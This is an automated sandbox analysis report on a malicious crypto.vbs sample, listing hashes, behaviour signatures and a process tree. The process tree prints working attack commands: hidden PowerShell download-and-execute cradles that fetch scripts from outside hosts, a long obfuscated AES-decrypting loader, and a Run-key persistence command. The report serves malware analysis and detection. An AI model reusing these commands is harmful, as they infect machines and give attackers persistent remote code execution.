Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30/01/2025, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
crypto.vbs
Resource
win7-20241010-en
General
-
Target
crypto.vbs
-
Size
273KB
-
MD5
d3a2ad6fb6dab0fa9dc4372edd2e2c36
-
SHA1
01e30df2eed8f6945c8705e1289f1a5fb874f9ad
-
SHA256
ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4
-
SHA512
c698631d9d5c76b4e6d99a22d3057f0c030865098ab156eff7070c672230af0718dc970542cc96d31defe23ce1aa5b6ef4b42c41d2f1f60ee4ec10a54b9543a6
-
SSDEEP
6144:uvpZGWTfNhok1a5w8PQAb4zfn2Lhi0XmQU8o:4pEYlM5w84icSh5Xm7
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2724 powershell.exe 3036 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3036 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2724 powershell.exe 3036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1104 wrote to memory of 2056 1104 WScript.exe 31 PID 1104 wrote to memory of 2056 1104 WScript.exe 31 PID 1104 wrote to memory of 2056 1104 WScript.exe 31 PID 2056 wrote to memory of 2368 2056 cmd.exe 33 PID 2056 wrote to memory of 2368 2056 cmd.exe 33 PID 2056 wrote to memory of 2368 2056 cmd.exe 33 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2724 2368 cmd.exe 35 PID 2368 wrote to memory of 2628 2368 cmd.exe 36 PID 2368 wrote to memory of 2628 2368 cmd.exe 36 PID 2368 wrote to memory of 2628 2368 cmd.exe 36 PID 2368 wrote to memory of 3036 2368 cmd.exe 37 PID 2368 wrote to memory of 3036 2368 cmd.exe 37 PID 2368 wrote to memory of 3036 2368 cmd.exe 37 PID 2368 wrote to memory of 3036 2368 cmd.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crypto.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f4⤵
- Adds Run key to start application
PID:2628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gcWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3gxd0YxZndiMlhia0N0SEgyd0NaR1FnY3UyZDB2ZVFlYUNVZzJsV2RlYTg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCc3UEo3ZkNYVnltb3F2VDFhOFdpSFRBPT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMoJHBhcmFtX3Zhcil7CUlFWCAnJHRxY21oemh6d2RhaGNsdmRnZWtxdnFjY3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGNudHBnZG56cG1ld3JpdW90b2lhZGl1bWM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkdHFjbWh6aHp3ZGFoY2x2ZGdla3F2cWNjdywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5Db3B5VG8oJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5EaXNwb3NlKCk7CSR0cWNtaHpoendkYWhjbHZkZ2VrcXZxY2N3LkRpc3Bvc2UoKTsJJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MuRGlzcG9zZSgpOwkkdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGRyZWt5c21ubXl6YmxxdnVscm5wa2Rjc3VyaXBtbGxtbWh4KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbG1iaGttcGlvbHdzemh6aGFpeXRxc3VmZ3N1eWNwdXNobXZxbXNmej1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkPSRsbWJoa21waW9sd3N6aHpoYWl5dHFzdWZnc3V5Y3B1c2htdnFtc2Z6LkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbnljcHNkcWZmd3VsdnJib29kdmZ4cWdjbyA9ICRlbnY6VVNFUk5BTUU7JHZramx1dmR1a2NyZnV1enhqeXRna2tjbXkgPSAnQzpcVXNlcnNcJyArICRueWNwc2RxZmZ3dWx2cmJvb2R2ZnhxZ2NvICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmtqbHV2ZHVrY3JmdXV6eGp5dGdra2NteTskYXFmenU9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCR2a2psdXZkdWtjcmZ1dXp4anl0Z2trY215KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZnl1IGluICRhcWZ6dSkgewlpZiAoJGZ5dS5TdGFydHNXaXRoKCc6OicpKQl7CQkkbGh4bXQ9JGZ5dS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWo9W3N0cmluZ1tdXSRsaHhtdC5TcGxpdCgnXCcpO0lFWCAnJGJ6ZGxrdmV6aGltbGFncWd5aXBta2doZWh6a2dxZGJmb21sPWdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMgKHFjanlnaWRtZmtqbXNqbnZmemZkYXBscGdqd2Jibm5vZHRlcmJ0aGggKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWpbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckY2NnZGZvcnV1cml6aXZhaGh0d3l2cnpla2x4amVoZ3hudm89Z3J4aGtlcGd5cGduaGV3YnF0cndsY2tzeHVqemV3dGxyeHdqc2RmYyAocWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRjaWxpYnp5c3hqcW93dm1iZ3NvYXNyYmRldHpvbWdncGppalsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtkcmVreXNtbm15emJscXZ1bHJucGtkY3N1cmlwbWxsbW1oeCAkYnpkbGt2ZXpoaW1sYWdxZ3lpcG1rZ2hlaHprZ3FkYmZvbWwgJG51bGw7ZHJla3lzbW5teXpibHF2dWxybnBrZGNzdXJpcG1sbG1taHggJGNjZ2Rmb3J1dXJpeml2YWhodHd5dnJ6ZWtseGplaGd4bnZvICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
265KB
MD56e899645463d001464d3b7d1ffe224fa
SHA104d16d1d22358ec0f5100855cf7a105096c8beb3
SHA25680226cfbbd380486029f9f2b06af35c1b7ae4efabe32eaf653ad4e846eeab7fb
SHA512e0b29154049fcfc760d42dc31857d66a2e460c3e882cfd5341aeea8c975d3e1fb91d02744e313aa844695b8900cc821d2f8ce06afd8326df06719152072b526e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SE76N6FEWZ27YKTSR0CV.temp
Filesize7KB
MD52f3b8a50d0a5daf2539ad78e690f3a43
SHA1da3491ed681110f061e612bd9bde3d2e2e6732ac
SHA256416309b2a666a9381ab6cd9198e656bbe5cc70cbabecc67fc6e658853e379c0e
SHA5129764e19d57781b59eb1c67eea32b04fc54587a3de2f4f4d11293dc972730f99b743917ff158f94819ea037d645af5466352245a6918345d41943077f7982f121